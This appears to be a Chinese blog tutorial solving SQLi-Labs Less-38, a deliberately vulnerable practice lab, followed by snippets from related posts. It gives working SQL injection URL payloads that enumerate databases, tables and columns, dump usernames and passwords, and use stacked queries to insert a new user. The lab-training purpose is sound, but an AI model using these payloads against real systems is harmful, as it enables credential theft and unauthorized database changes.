SQLi Labs Less-38 堆叠注入

已于 2024-06-23 10:47:09 修改
阅读量1.5w 收藏 9
点赞数 4
分类专栏: 《靶场实战》 文章标签: 安全 web安全 网络安全
于 2021-06-22 00:06:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118096837
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

第三十八关请求方式为GET请求 , 注入类型为 单引号字符串型注入

第一步,测试注入方式

?id=1' and false-- a

 SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下

 

 本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入

第二步,判断字段数

使用order by 排序 测试字段数量

?id=1' order by 4 -- a

 从第1列开始测试 , 直至报错 , 第4列开始异常 固 字段数为3

第三步,判断显示位置

 使用 union 联合查询 测试字段显示的位置

?id=-1' union select 1,2,3 -- a

此处 id=-1 , 由于id不能为负数 , 所以该SQL查询不到用户数据 , 返回的结果就只有 联合查询的 1 2 3 这一条数据 , 目的在于方便展示字段显示位置

第四步,获取所有数据库

查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有的数据库名

?id=-1' union select 1,2,
(select group_concat(schema_name)
from information_schema.schemata)
 -- a

 此处的 group_concat() , 可以将多行数据 合并为一行

下一步 , 根据 security 数据库 , 获取其所有表

第五步,获取所有表

查询information_schema默认数据库的tables表的table_name字段 , 该字段保存了所有的表名

?id=-1' union select 1,2,
(select group_concat(table_name)
from information_schema.tables 
where table_schema='security')
 -- a

users表为用户表 , 下一步根据users表获取其所有字段

第六步,获取所有字段

查询information_schema默认数据库的columns表的column_name字段 , 该字段保存了所以的字段名

?id=-1' union select 1,2,
(select group_concat(column_name)
from information_schema.columns 
where table_schema='security' and table_name='users')
 -- a

至此可知 , 数据库 security, 表 users, 字段 id,users,password , 下一步 ,根据此信息查询账号和密码

第七步,获取账号密码

?id=-1' union select 1,2,
(select group_concat(username,'~',password)
from users)
 -- a

第八步,叠加注入

 利用该关卡的SQL的 mysqli_multi_query() , 同时执行多条SQL , 实现插入用户

?id=-1' ;
insert into users(id,username,password)
values(20,'zhangsan','123')
 -- a

访问新增的用户 id为20

士别三日wyx
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs(38-53)
qq_43395215的博客
08-26 579
文章目录第38关:第39关:第40关:第41关:第42关:第43关:第44关:第45关:第46关:第47关:第48关:第49关:第50关:第51关:第52关:第53关: 第38关: 这一关挺简单的,就一个闭合判断,就可爆数据,但是,这一关的目的不是查询数据,而是通过堆叠注入,对数据库执行操作 堆叠注入,就是利用sql中“;”是标志一句话结束,我们可以通过“;”将多个语句写入到sql语句中,这里的语句就不仅仅是指查询,还有增删查改 闭合判断: /Less-38/?id=1' and 1=1 --+ sql
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
web漏洞-SQL注入漏洞扩展(堆叠查询注入)-SQLi LABS 38关到41关讲解
ran的博客
01-19 679
比如在注入时,需要得到管理员的账号和密码,但是这个密码是加密的,且无法解密,此时便可以利用堆叠注入向管理员用户的表内进行插入用户数据,创建用户来登录迂回的注入数据库,但是前提是网站的管理员必须是高权限才能完全创建用户。因为是插入的数据,所以新插入的管理员用户的密码是自定义的,将用户数据插入之后,就可以实施登录了,此时便可以忽略密码无法解密的问题。区别就在于 union或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。”(返回执行的SQL语句并换行)。
SQLi 38关_sqli-labs 38
最新发布
2401_84264692的博客
05-17 818
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
sqli-labs(38-41)
qq_43579362的博客
02-17 392
0x01 原理 堆叠注入,顾名思义就是很多语句结合在一起进行注入,在sql语句中,以;标志着一条语句的结束,要实现堆叠注入就是用;连接多条语句进行注入,即我们可以结束一个语句后,构造下一个语句。而union select也是将两条语句结合在一起一起执行,两者有何区别?区别在于联合注入只能使用查询语句,而堆叠注入可以使用任何语句,可以使用任何语句并不代表着它没有限制,它可能受到API,数据库引擎,权...
sqli-labs靶场(23-38关)
weixin_51566481的博客
08-16 1165
sqli-labs,sql注入
sqli-labs(38)
weixin_30522095的博客
06-01 180
0X01 ?id=1' and 1=1%23 正确   ?id=1' and 1=2%23 错误 存在注入 0x1 堆叠注入讲解 (1)前言   国内有的称为堆查询注入,也有称之为堆叠注入。个人认为称之为堆叠注入更为准确。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新 的查询或者终止查询,可以达到修改数据和调用存储过程的目的。这种技术在SQL注入中还是比较频繁的。 (2...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
mysql注入-sqlilabs靶场注入
10-15
首先,我们要了解SQL注入的基本类型:错误注入、盲注、时间盲注和堆叠查询注入。错误注入是通过触发服务器错误来获取信息,而盲注则是在不显示查询结果的情况下判断条件是否为真。时间盲注利用了数据库处理查询的...
基于Sqli-Labs靶场的SQL注入-38~45关
Joker
01-11 803
这一篇博客我主要讲了堆叠注入,包括堆叠注入原理、注入条件、注入方法等。堆叠注入的前提条件多,可以实际应用的场景较少。但是只要能够进行堆叠注入,就可以对后台数据库造成很大的伤害。
SQL注入详解 38-45关
君莫hacker的博客
10-15 437
目录Less-38堆叠注入)Less-39(堆叠注入)Less-40(堆叠注入)Less-41(堆叠注入)Less-42(登录点堆叠注入)Less-43Less-44Less-45 Less-38堆叠注入) 第38关总结: 从第38关开始就是堆叠注入,通过构造语句,可以对数据库进行更大的利用,若权限足够高,我们可以进行对数据库的增删改查,读取写入文件,修改各用户权限,进行更多的利用 判断注入类型 单引号字符型注入 判断注入字段数及显示位置 查看数据库名 爆表 爆列 爆数据 在38关,以上的注入
sqli-labs通关攻略38-53[Stacked Injections]
Keepb1ue的博客
08-10 5278
Stacked Injections 文章目录Stacked Injectionsless-38less-39less-40less-41less-42less-43less-44less-45less-46less-47less-48less-49less-50less-51less-52less-53 less-38 由于在这里使用了执行一个或多个sql语句的函数mysqli_multi_query。 所以可以尝试堆叠注入堆叠注入就是执行多条SQL语句,通过;分割;在实战中,由于正常数据库只会回显出
sql-labs闯关38~45
qq_44663230的博客
09-07 1663
sql-labs 38~45 堆叠注入
SQLi-labs 堆叠注入 38-53关
感恩
09-18 145
SQLi-labs 堆叠注入 39-53关
sqli-Labs————less-38
Fly_鹏程万里
05-20 958
Less-38源代码:<?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tran...
SQLi-LABS-Page-3-less-38-53注入教程
残阳泼茶香的博客
03-17 553
Lesson - 38GET - Stacked Query Injection - String堆叠的查询 输入http://sql/Less-38/?id=1 ’ 报错显示说“1” 后面多了一个单引号, 那么就上手吧。 `http://sql/Less-38/?id=1%27%20order%20by%203%23,按着步骤来,http://sql/Less-38/?id=-1%20%2...
Sqlilabs-Less38-
09-23
Sqlilabs-Less38是一个关于SQL注入的实验题目。在这个实验中,你需要通过注入恶意的SQL代码来获取敏感信息或者修改数据库中的数据。 在这个具体的实验中,通过输入一个id参数,我们可以在URL中进行注入。在第一步中,我们尝试闭合单引号来看是否存在注入点。在第二步中,我们尝试使用恶意的union select语句来获取数据库中的信息。在这个例子中,我们使用了"-2") union select 1,2,3 --"作为注入代码。通过这个注入代码,我们可以判断当前数据库的一些信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值